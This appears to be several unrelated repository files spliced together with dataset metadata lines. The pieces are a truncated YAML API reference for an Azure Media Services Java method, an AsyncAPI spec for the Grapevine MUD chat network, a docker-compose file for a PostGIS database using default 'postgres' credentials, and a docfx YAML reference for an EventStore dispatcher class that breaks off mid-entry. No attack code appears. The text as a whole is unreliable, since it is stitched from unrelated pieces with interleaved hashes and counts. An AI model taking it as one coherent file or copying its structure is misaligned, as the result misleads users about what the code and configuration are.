"com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.withKeyToTrackMappings(List<StreamingPolicyContentKey> keyToTrackMappings)" overload: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.withKeyToTrackMappings*" type: "Method" package: "com.microsoft.azure.management.mediaservices.v2018_07_01" summary: "Set representing tracks needs separate content key." syntax: content: "public StreamingPolicyContentKeys withKeyToTrackMappings(List<StreamingPolicyContentKey> keyToTrackMappings)" parameters: - id: "keyToTrackMappings" type: "java.util.List<com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKey>" description: "the keyToTrackMappings value to set" return: type: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys" description: "the StreamingPolicyContentKeys object itself." references: - uid: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.StreamingPolicyContentKeys*" name: "StreamingPolicyContentKeys" nameWithType: "StreamingPolicyContentKeys.StreamingPolicyContentKeys" fullName: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.StreamingPolicyContentKeys" package: "com.microsoft.azure.management.mediaservices.v2018_07_01" - uid: "com.microsoft.azure.management.mediaservices.v2018_07_01.DefaultKey" name: "DefaultKey" nameWithType: "DefaultKey" fullName: "com.microsoft.azure.management.mediaservices.v2018_07_01.DefaultKey" - uid: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.defaultKey*" name: "defaultKey" nameWithType: "StreamingPolicyContentKeys.defaultKey" fullName: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.defaultKey" package: "com.microsoft.azure.management.mediaservices.v2018_07_01" - uid: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.withDefaultKey*" name: "withDefaultKey" nameWithType: "StreamingPolicyContentKeys.withDefaultKey" fullName: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.withDefaultKey" package: "com.microsoft.azure.management.mediaservices.v2018_07_01" - uid: "java.util.List<com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKey>" spec.java: - uid: "java.util.List" name: "List" fullName: "java.util.List" - name: "<" fullName: "<" - uid: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKey" name: "StreamingPolicyContentKey" fullName: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKey" - name: ">" fullName: ">" - uid: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.keyToTrackMappings*" name: "keyToTrackMappings" nameWithType: "StreamingPolicyContentKeys.keyToTrackMappings" fullName: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.keyToTrackMappings" package: "com.microsoft.azure.management.mediaservices.v2018_07_01" - uid: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.withKeyToTrackMappings*" name: "withKeyToTrackMappings" nameWithType: "StreamingPolicyContentKeys.withKeyToTrackMappings" fullName: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKeys.withKeyToTrackMappings" package: "com.microsoft.azure.management.mediaservices.v2018_07_01" - uid: "java.lang.Object.notify()" name: "Object.notify()" nameWithType: "Object.notify()" fullName: "java.lang.Object.notify()" - uid: "java.lang.Object.wait()" name: "Object.wait()" nameWithType: "Object.wait()" fullName: "java.lang.Object.wait()" - uid: "java.lang.Object.finalize()" name: "Object.finalize()" nameWithType: "Object.finalize()" fullName: "java.lang.Object.finalize()" - uid: "java.lang.Object.clone()" name: "Object.clone()" nameWithType: "Object.clone()" fullName: "java.lang.Object.clone()" - uid: "java.lang.Object.notifyAll()" name: "Object.notifyAll()" nameWithType: "Object.notifyAll()" fullName: "java.lang.Object.notifyAll()" - uid: "java.lang.Object.equals(java.lang.Object)" name: "Object.equals(Object)" nameWithType: "Object.equals(Object)" fullName: "java.lang.Object.equals(java.lang.Object)" - uid: "java.lang.Object.getClass()" name: "Object.getClass()" nameWithType: "Object.getClass()" fullName: "java.lang.Object.getClass()" - uid: "java.lang.Object.wait(long)" name: "Object.wait(long)" nameWithType: "Object.wait(long)" fullName: "java.lang.Object.wait(long)" - uid: "java.lang.Object.hashCode()" name: "Object.hashCode()" nameWithType: "Object.hashCode()" fullName: "java.lang.Object.hashCode()" - uid: "java.lang.Object.wait(long,int)" name: "Object.wait(long,int)" nameWithType: "Object.wait(long,int)" fullName: "java.lang.Object.wait(long,int)" - uid: "java.lang.Object.toString()" name: "Object.toString()" nameWithType: "Object.toString()" fullName: "java.lang.Object.toString()" - uid: "java.util.List" name: "List" nameWithType: "List" fullName: "java.util.List" - uid: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKey" name: "StreamingPolicyContentKey" nameWithType: "StreamingPolicyContentKey" fullName: "com.microsoft.azure.management.mediaservices.v2018_07_01.StreamingPolicyContentKey"
55.520548
215
0.799655
648468597795cd19a582b2b78e73fe85134dee42
9,047
yml
YAML
spec.yml
sb8244/grapevine
effaaa01294d30114090c20f9cc40b8665d834f2
[ "MIT" ]
null
null
null
spec.yml
sb8244/grapevine
effaaa01294d30114090c20f9cc40b8665d834f2
[ "MIT" ]
null
null
null
spec.yml
sb8244/grapevine
effaaa01294d30114090c20f9cc40b8665d834f2
[ "MIT" ]
null
null
null
asyncapi: '1.2.0' info: title: Grapevine API version: '2.0.0' description: The MUD Chat Network license: name: MIT url: 'https://github.com/oestrich/grapevine/blob/master/LICENSE' servers: - url: wss://grapevine.haus/socket scheme: wss description: Web Socket components: messages: authenticateRequest: summary: "Authenticate to the service after connecting" description: | You must send this to authenticate your socket and continue. Generates an authenticate response. payload: type: object required: - event - payload properties: event: type: string payload: type: object required: - client_id - client_secret - supports properties: client_id: type: string client_secret: type: string supports: type: array items: type: string enum: - "channels" - "players" - "tells" channels: type: array items: type: string version: type: string user_agent: type: string example: event: "authenticate" payload: client_id: "client id" client_secret: "client secret" supports: - "channels" channels: - "grapevine" version: "1.0.0" user_agent: "ExVenture 0.25.0" authenticateResponse: summary: "Response from an `authenticate` event" payload: type: object properties: event: type: string status: type: string enum: - success - failure payload: type: object properties: unicode: type: string description: | Sends back a unicode check mark to verify your client supports unicode version: description: "Server version of Grapevine" type: string example: event: "authenticate" status: "success" payload: unicode: "✔️" version: "2.0.0" channelsBroadcast: summary: "Receive a new broadcast on a channel you are subscribed to" payload: type: object required: - event - payload properties: event: type: string payload: type: object properties: channel: type: string message: type: string game: type: string name: type: string example: event: "chanels/broadcast" payload: channel: "grapevine" message: "Hello everyone!" game: "ExVenture" name: "Player" channelsSend: summary: "Send a new message on a channel" description: | Send a new message on a channel If a reference is included, you will receive a channelsSendResponse back payload: type: object required: - event - payload properties: event: type: string ref: type: string format: uuid payload: type: object required: - channel - message - name properties: channel: type: string message: type: string name: type: string example: event: "channels/send" ref: "28523394-6dcf-4c2a-ad1d-2d0ef8bb823b" payload: channel: "grapevine" message: "Hello there!" name: "Player" channelsSendResponse: summary: Response back from a "channels/send" if a reference was included payload: type: object required: - event - ref properties: event: type: string ref: type: string format: uuid example: event: "channels/send" ref: "28523394-6dcf-4c2a-ad1d-2d0ef8bb823b" channelsSubscribe: summary: "Subscribe to a new channel" description: | Subscribe to a new channel. If a reference is included, you will receive a channelsSubscribeResponse back payload: type: object required: - event - payload properties: event: type: string ref: type: string format: uuid payload: type: object properties: channel: type: string example: event: "channels/subscribe" ref: "a6f8006d-ddac-465e-a3df-fb440e83189b" payload: channel: "grapevine" channelsSubscribeResponse: summary: "Response from a 'channels/subscribe' event" payload: type: object required: - event - ref properties: event: type: string ref: type: string format: uuid example: event: "channels/subscribe" ref: "a6f8006d-ddac-465e-a3df-fb440e83189b" channelsUnsubscribe: summary: "Unsubscribe to a channel" description: | Unsubscribe to a channel. If a reference is included, you will receive a channelsUnsubscribeResponse back payload: type: object required: - event - payload properties: event: type: string ref: type: string format: uuid payload: type: object properties: channel: type: string example: event: "channels/unsubscribe" ref: "a6f8006d-ddac-465e-a3df-fb440e83189b" payload: channel: "grapevine" channelsUnsubscribeResponse: summary: "Response from a 'channels/unsubscribe' event" payload: type: object required: - event - ref properties: event: type: string ref: type: string format: uuid example: event: "channels/unsubscribe" ref: "a6f8006d-ddac-465e-a3df-fb440e83189b" heartbeatReceive: summary: "A heartbeat to keep the connection alive" description: | A heartbeat to keep the connection alive Also syncs the current player list payload: type: object properties: event: type: "string" example: event: "heartbeat" heartbeatResponse: summary: "A heartbeat to keep the connection alive" description: | Response to the server sent heartbeat event Also syncs the current player list payload: type: object properties: event: type: "string" payload: type: object properties: players: type: array items: type: string example: event: "heartbeat" payload: players: - "Player1" - "Player2" restart: summary: "A message saying the service is restarting shortly" payload: type: object properties: event: type: string ref: type: string format: uuid payload: downtime: type: integer example: event: restart ref: f15ed228-ad43-4af4-9466-7d353fc9bf11 payload: downtime: 15 events: receive: - $ref: "#/components/messages/authenticateResponse" - $ref: "#/components/messages/channelsBroadcast" - $ref: "#/components/messages/channelsSendResponse" - $ref: "#/components/messages/channelsSubscribeResponse" - $ref: "#/components/messages/channelsUnsubscribeResponse" - $ref: "#/components/messages/heartbeatReceive" - $ref: "#/components/messages/restart" send: - $ref: "#/components/messages/authenticateRequest" - $ref: "#/components/messages/channelsSend" - $ref: "#/components/messages/channelsSubscribe" - $ref: "#/components/messages/channelsUnsubscribe" - $ref: "#/components/messages/heartbeatResponse"
26.299419
88
0.494639
033f8435a3db4a1b49c13276c66c5fa17f4ac629
452
yml
YAML
example/docker-compose.yml
bryanhughes/proto-crudl
3d9a13252a823179ee31c1c96fec135ced85b0e4
[ "Apache-2.0" ]
6
2021-03-12T10:52:18.000Z
2022-03-05T22:27:15.000Z
example/docker-compose.yml
bryanhughes/proto-crudl
3d9a13252a823179ee31c1c96fec135ced85b0e4
[ "Apache-2.0" ]
null
null
null
example/docker-compose.yml
bryanhughes/proto-crudl
3d9a13252a823179ee31c1c96fec135ced85b0e4
[ "Apache-2.0" ]
null
null
null
version: '3.6' services: postgres: image: postgis/postgis:latest container_name: example-db restart: always environment: - DATABASE_HOST=127.0.0.1 - POSTGRES_USER=postgres - POSTGRES_PASSWORD=postgres - POSTGRES_DB=proto_crudl ports: - "5432:5432" volumes: - ./database/init.sql:/docker-entrypoint-initdb.d/1-init.sql - ./database/example.sql:/docker-entrypoint-initdb.d/2-example.sql
28.25
72
0.668142
7c8534016c1a5e915c67d7da0d324f5c510ceb7f
63,051
yml
YAML
dotnet-api/code/EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.yml
saichaitanyareddy/documentation
293d96ce699bbd893feb42f32eed80fcbde51f1e
[ "BSD-3-Clause" ]
null
null
null
dotnet-api/code/EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.yml
saichaitanyareddy/documentation
293d96ce699bbd893feb42f32eed80fcbde51f1e
[ "BSD-3-Clause" ]
null
null
null
dotnet-api/code/EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.yml
saichaitanyareddy/documentation
293d96ce699bbd893feb42f32eed80fcbde51f1e
[ "BSD-3-Clause" ]
null
null
null
### YamlMime:ManagedReference items: - uid: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher commentId: T:EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher id: ProjectionManagerMessageDispatcher parent: EventStore.Projections.Core.Services.Management children: - EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.#ctor(System.Collections.Generic.IDictionary{System.Guid,EventStore.Core.Bus.IPublisher}) - EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage) - EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase) - EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase) - EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading) langs: - csharp - vb name: ProjectionManagerMessageDispatcher nameWithType: ProjectionManagerMessageDispatcher fullName: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher type: Class source: id: ProjectionManagerMessageDispatcher path: /Users/chrisward/Workspace/EventStore/EventStore/src/EventStore.Projections.Core/Services/Management/ProjectionManagerMessageDispatcher.cs startLine: 9 assemblies: - EventStore.Projections.Core namespace: EventStore.Projections.Core.Services.Management syntax: content: 'public class ProjectionManagerMessageDispatcher : IHandle<PartitionProcessingResultBase>, IHandle<ReaderSubscriptionManagement.SpoolStreamReading>, IHandle<CoreProjectionManagementControlMessage>, IHandle<PartitionProcessingResultOutputBase>' content.vb: >- Public Class ProjectionManagerMessageDispatcher Implements IHandle(Of PartitionProcessingResultBase), IHandle(Of ReaderSubscriptionManagement.SpoolStreamReading), IHandle(Of CoreProjectionManagementControlMessage), IHandle(Of PartitionProcessingResultOutputBase) inheritance: - System.Object implements: - EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase} - EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading} - EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage} - EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase} inheritedMembers: - System.Object.Equals(System.Object) - System.Object.Equals(System.Object,System.Object) - System.Object.GetHashCode - System.Object.GetType - System.Object.MemberwiseClone - System.Object.ReferenceEquals(System.Object,System.Object) - System.Object.ToString extensionMethods: - System.Object.EventStore.Common.Utils.Json.ToJsonBytes - System.Object.EventStore.Common.Utils.Json.ToJson - System.Object.EventStore.Common.Utils.Json.ToCanonicalJson - EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.Serialize``1 - EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.EventStore.Core.Services.Transport.Tcp.ProtobufExtensions.SerializeToArray``1 modifiers.csharp: - public - class modifiers.vb: - Public - Class - uid: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.#ctor(System.Collections.Generic.IDictionary{System.Guid,EventStore.Core.Bus.IPublisher}) commentId: M:EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.#ctor(System.Collections.Generic.IDictionary{System.Guid,EventStore.Core.Bus.IPublisher}) id: '#ctor(System.Collections.Generic.IDictionary{System.Guid,EventStore.Core.Bus.IPublisher})' parent: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher langs: - csharp - vb name: ProjectionManagerMessageDispatcher(IDictionary<Guid, IPublisher>) nameWithType: ProjectionManagerMessageDispatcher.ProjectionManagerMessageDispatcher(IDictionary<Guid, IPublisher>) fullName: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.ProjectionManagerMessageDispatcher(System.Collections.Generic.IDictionary<System.Guid, EventStore.Core.Bus.IPublisher>) type: Constructor source: id: .ctor path: /Users/chrisward/Workspace/EventStore/EventStore/src/EventStore.Projections.Core/Services/Management/ProjectionManagerMessageDispatcher.cs startLine: 17 assemblies: - EventStore.Projections.Core namespace: EventStore.Projections.Core.Services.Management syntax: content: public ProjectionManagerMessageDispatcher(IDictionary<Guid, IPublisher> queueMap) parameters: - id: queueMap type: System.Collections.Generic.IDictionary{System.Guid,EventStore.Core.Bus.IPublisher} content.vb: Public Sub New(queueMap As IDictionary(Of Guid, IPublisher)) overload: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.#ctor* nameWithType.vb: ProjectionManagerMessageDispatcher.ProjectionManagerMessageDispatcher(IDictionary(Of Guid, IPublisher)) modifiers.csharp: - public modifiers.vb: - Public fullName.vb: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.ProjectionManagerMessageDispatcher(System.Collections.Generic.IDictionary(Of System.Guid, EventStore.Core.Bus.IPublisher)) name.vb: ProjectionManagerMessageDispatcher(IDictionary(Of Guid, IPublisher)) - uid: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase) commentId: M:EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase) id: Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase) parent: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher langs: - csharp - vb name: Handle(PartitionProcessingResultBase) nameWithType: ProjectionManagerMessageDispatcher.Handle(PartitionProcessingResultBase) fullName: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase) type: Method source: id: Handle path: /Users/chrisward/Workspace/EventStore/EventStore/src/EventStore.Projections.Core/Services/Management/ProjectionManagerMessageDispatcher.cs startLine: 21 assemblies: - EventStore.Projections.Core namespace: EventStore.Projections.Core.Services.Management syntax: content: public void Handle(PartitionProcessingResultBase message) parameters: - id: message type: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase content.vb: Public Sub Handle(message As PartitionProcessingResultBase) overload: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle* implements: - EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase}.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase) modifiers.csharp: - public modifiers.vb: - Public - uid: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading) commentId: M:EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading) id: Handle(EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading) parent: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher langs: - csharp - vb name: Handle(ReaderSubscriptionManagement.SpoolStreamReading) nameWithType: ProjectionManagerMessageDispatcher.Handle(ReaderSubscriptionManagement.SpoolStreamReading) fullName: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading) type: Method source: id: Handle path: /Users/chrisward/Workspace/EventStore/EventStore/src/EventStore.Projections.Core/Services/Management/ProjectionManagerMessageDispatcher.cs startLine: 25 assemblies: - EventStore.Projections.Core namespace: EventStore.Projections.Core.Services.Management syntax: content: public void Handle(ReaderSubscriptionManagement.SpoolStreamReading message) parameters: - id: message type: EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading content.vb: Public Sub Handle(message As ReaderSubscriptionManagement.SpoolStreamReading) overload: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle* implements: - EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading}.Handle(EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading) modifiers.csharp: - public modifiers.vb: - Public - uid: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage) commentId: M:EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage) id: Handle(EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage) parent: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher langs: - csharp - vb name: Handle(CoreProjectionManagementControlMessage) nameWithType: ProjectionManagerMessageDispatcher.Handle(CoreProjectionManagementControlMessage) fullName: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage) type: Method source: id: Handle path: /Users/chrisward/Workspace/EventStore/EventStore/src/EventStore.Projections.Core/Services/Management/ProjectionManagerMessageDispatcher.cs startLine: 35 assemblies: - EventStore.Projections.Core namespace: EventStore.Projections.Core.Services.Management syntax: content: public void Handle(CoreProjectionManagementControlMessage message) parameters: - id: message type: EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage content.vb: Public Sub Handle(message As CoreProjectionManagementControlMessage) overload: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle* implements: - EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage}.Handle(EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage) modifiers.csharp: - public modifiers.vb: - Public - uid: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase) commentId: M:EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase) id: Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase) parent: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher langs: - csharp - vb name: Handle(PartitionProcessingResultOutputBase) nameWithType: ProjectionManagerMessageDispatcher.Handle(PartitionProcessingResultOutputBase) fullName: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase) type: Method source: id: Handle path: /Users/chrisward/Workspace/EventStore/EventStore/src/EventStore.Projections.Core/Services/Management/ProjectionManagerMessageDispatcher.cs startLine: 47 assemblies: - EventStore.Projections.Core namespace: EventStore.Projections.Core.Services.Management syntax: content: public void Handle(PartitionProcessingResultOutputBase message) parameters: - id: message type: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase content.vb: Public Sub Handle(message As PartitionProcessingResultOutputBase) overload: EventStore.Projections.Core.Services.Management.ProjectionManagerMessageDispatcher.Handle* implements: - EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase}.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase) modifiers.csharp: - public modifiers.vb: - Public references: - uid: EventStore.Projections.Core.Services.Management commentId: N:EventStore.Projections.Core.Services.Management name: EventStore.Projections.Core.Services.Management nameWithType: EventStore.Projections.Core.Services.Management fullName: EventStore.Projections.Core.Services.Management - uid: System.Object commentId: T:System.Object parent: System isExternal: true name: Object nameWithType: Object fullName: System.Object - uid: EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase} commentId: T:EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase} parent: EventStore.Core.Bus definition: EventStore.Core.Bus.IHandle`1 name: IHandle<PartitionProcessingResultBase> nameWithType: IHandle<PartitionProcessingResultBase> fullName: EventStore.Core.Bus.IHandle<EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase> nameWithType.vb: IHandle(Of PartitionProcessingResultBase) fullName.vb: EventStore.Core.Bus.IHandle(Of EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase) name.vb: IHandle(Of PartitionProcessingResultBase) spec.csharp: - uid: EventStore.Core.Bus.IHandle`1 name: IHandle nameWithType: IHandle fullName: EventStore.Core.Bus.IHandle - name: < nameWithType: < fullName: < - uid: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase name: PartitionProcessingResultBase nameWithType: PartitionProcessingResultBase fullName: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase - name: '>' nameWithType: '>' fullName: '>' spec.vb: - uid: EventStore.Core.Bus.IHandle`1 name: IHandle nameWithType: IHandle fullName: EventStore.Core.Bus.IHandle - name: '(Of ' nameWithType: '(Of ' fullName: '(Of ' - uid: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase name: PartitionProcessingResultBase nameWithType: PartitionProcessingResultBase fullName: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultBase - name: ) nameWithType: ) fullName: ) - uid: EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading} commentId: T:EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading} parent: EventStore.Core.Bus definition: EventStore.Core.Bus.IHandle`1 name: IHandle<ReaderSubscriptionManagement.SpoolStreamReading> nameWithType: IHandle<ReaderSubscriptionManagement.SpoolStreamReading> fullName: EventStore.Core.Bus.IHandle<EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading> nameWithType.vb: IHandle(Of ReaderSubscriptionManagement.SpoolStreamReading) fullName.vb: EventStore.Core.Bus.IHandle(Of EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading) name.vb: IHandle(Of ReaderSubscriptionManagement.SpoolStreamReading) spec.csharp: - uid: EventStore.Core.Bus.IHandle`1 name: IHandle nameWithType: IHandle fullName: EventStore.Core.Bus.IHandle - name: < nameWithType: < fullName: < - uid: EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading name: ReaderSubscriptionManagement.SpoolStreamReading nameWithType: ReaderSubscriptionManagement.SpoolStreamReading fullName: EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading - name: '>' nameWithType: '>' fullName: '>' spec.vb: - uid: EventStore.Core.Bus.IHandle`1 name: IHandle nameWithType: IHandle fullName: EventStore.Core.Bus.IHandle - name: '(Of ' nameWithType: '(Of ' fullName: '(Of ' - uid: EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading name: ReaderSubscriptionManagement.SpoolStreamReading nameWithType: ReaderSubscriptionManagement.SpoolStreamReading fullName: EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading - name: ) nameWithType: ) fullName: ) - uid: EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage} commentId: T:EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage} parent: EventStore.Core.Bus definition: EventStore.Core.Bus.IHandle`1 name: IHandle<CoreProjectionManagementControlMessage> nameWithType: IHandle<CoreProjectionManagementControlMessage> fullName: EventStore.Core.Bus.IHandle<EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage> nameWithType.vb: IHandle(Of CoreProjectionManagementControlMessage) fullName.vb: EventStore.Core.Bus.IHandle(Of EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage) name.vb: IHandle(Of CoreProjectionManagementControlMessage) spec.csharp: - uid: EventStore.Core.Bus.IHandle`1 name: IHandle nameWithType: IHandle fullName: EventStore.Core.Bus.IHandle - name: < nameWithType: < fullName: < - uid: EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage name: CoreProjectionManagementControlMessage nameWithType: CoreProjectionManagementControlMessage fullName: EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage - name: '>' nameWithType: '>' fullName: '>' spec.vb: - uid: EventStore.Core.Bus.IHandle`1 name: IHandle nameWithType: IHandle fullName: EventStore.Core.Bus.IHandle - name: '(Of ' nameWithType: '(Of ' fullName: '(Of ' - uid: EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage name: CoreProjectionManagementControlMessage nameWithType: CoreProjectionManagementControlMessage fullName: EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage - name: ) nameWithType: ) fullName: ) - uid: EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase} commentId: T:EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase} parent: EventStore.Core.Bus definition: EventStore.Core.Bus.IHandle`1 name: IHandle<PartitionProcessingResultOutputBase> nameWithType: IHandle<PartitionProcessingResultOutputBase> fullName: EventStore.Core.Bus.IHandle<EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase> nameWithType.vb: IHandle(Of PartitionProcessingResultOutputBase) fullName.vb: EventStore.Core.Bus.IHandle(Of EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase) name.vb: IHandle(Of PartitionProcessingResultOutputBase) spec.csharp: - uid: EventStore.Core.Bus.IHandle`1 name: IHandle nameWithType: IHandle fullName: EventStore.Core.Bus.IHandle - name: < nameWithType: < fullName: < - uid: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase name: PartitionProcessingResultOutputBase nameWithType: PartitionProcessingResultOutputBase fullName: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase - name: '>' nameWithType: '>' fullName: '>' spec.vb: - uid: 